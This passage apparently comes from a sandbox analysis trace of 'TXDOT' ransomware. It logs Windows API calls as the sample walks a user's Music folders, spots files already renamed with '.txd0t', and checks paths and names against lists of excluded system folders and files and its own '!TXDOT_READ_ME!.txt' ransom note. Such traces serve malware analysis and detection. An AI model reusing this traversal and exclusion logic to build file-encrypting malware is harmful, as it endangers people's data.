lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.583] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4468cd60, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x5d990a0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x51df71c4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f5, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="W-oOtVbhE3qMz.wav.txd0t", cAlternateFileName="W-OOTV~1.TXD")) returned 1 [0129.583] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2=".") returned 1 [0129.583] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2="..") returned 1 [0129.584] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="W-oOtVbhE3qMz.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t" [0129.584] PathFindExtensionW (pszPath="W-oOtVbhE3qMz.wav.txd0t") returned=".txd0t" [0129.584] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.584] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 1 [0129.584] StrCmpW (psz1="WDCK.m4a.txd0t", psz2=".") returned 1 [0129.584] StrCmpW (psz1="WDCK.m4a.txd0t", psz2="..") returned 1 [0129.584] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="WDCK.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t" [0129.584] PathFindExtensionW (pszPath="WDCK.m4a.txd0t") returned=".txd0t" [0129.584] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.584] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 0 [0129.584] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.584] GetProcessHeap () returned 0xe30000 [0129.584] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.584] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5450cdb0, ftCreationTime.dwHighDateTime=0x1d5e2b4, ftLastAccessTime.dwLowDateTime=0x341c2fc0, ftLastAccessTime.dwHighDateTime=0x1d5e440, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd67, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="VO0C5WvUIA8AyL.m4a.txd0t", cAlternateFileName="VO0C5W~1.TXD")) returned 1 [0129.584] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2=".") returned 1 [0129.584] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2="..") returned 1 [0129.584] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="VO0C5WvUIA8AyL.m4a.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t" [0129.584] PathFindExtensionW (pszPath="VO0C5WvUIA8AyL.m4a.txd0t") returned=".txd0t" [0129.584] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.584] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 1 [0129.584] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2=".") returned 1 [0129.584] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2="..") returned 1 [0129.584] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.584] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="z37nyAMgu2jp3cfWIU", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.584] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system32\\") returned 0x0 [0129.584] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.584] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\local\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\boot\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\perflogs\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\programdata\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\drivers\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\wsus\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="crypt_detect") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="cryptolocker") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="ransomware") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\WINDOWS") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.585] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files") returned 0x0 [0129.585] GetProcessHeap () returned 0xe30000 [0129.585] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed90d0 [0129.585] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.585] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*" [0129.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.585] StrCmpW (psz1=".", psz2=".") returned 0 [0129.585] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.585] StrCmpW (psz1="..", psz2=".") returned 1 [0129.585] StrCmpW (psz1="..", psz2="..") returned 0 [0129.586] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e69890, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.586] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.586] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.586] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.586] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.586] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt" [0129.586] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.586] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.586] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.586] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f9e610, ftCreationTime.dwHighDateTime=0x1d5ee03, ftLastAccessTime.dwLowDateTime=0x12962240, ftLastAccessTime.dwHighDateTime=0x1d5ed85, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x172c3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="5YOR.m4a.txd0t", cAlternateFileName="5YORM4~1.TXD")) returned 1 [0129.586] StrCmpW (psz1="5YOR.m4a.txd0t", psz2=".") returned 1 [0129.586] StrCmpW (psz1="5YOR.m4a.txd0t", psz2="..") returned 1 [0129.586] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.586] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.586] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="5YOR.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t" [0129.586] PathFindExtensionW (pszPath="5YOR.m4a.txd0t") returned=".txd0t" [0129.586] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.586] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="7k19qHZKQ", cAlternateFileName="7K19QH~1")) returned 1 [0129.586] StrCmpW (psz1="7k19qHZKQ", psz2=".") returned 1 [0129.586] StrCmpW (psz1="7k19qHZKQ", psz2="..") returned 1 [0129.586] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.586] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.587] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="7k19qHZKQ", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system32\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\local\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\boot\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\perflogs\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\programdata\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\drivers\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\wsus\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="crypt_detect") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="cryptolocker") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="ransomware") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\WINDOWS") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.587] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files") returned 0x0 [0129.587] GetProcessHeap () returned 0xe30000 [0129.587] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e6) returned 0xef3600 [0129.587] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0129.587] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\*", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*" [0129.587] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0129.587] StrCmpW (psz1=".", psz2=".") returned 0 [0129.588] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.588] StrCmpW (psz1="..", psz2=".") returned 1 [0129.588] StrCmpW (psz1="..", psz2="..") returned 0 [0129.588] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e8fa97, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e8fa97, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.588] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.588] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.588] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0129.588] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: 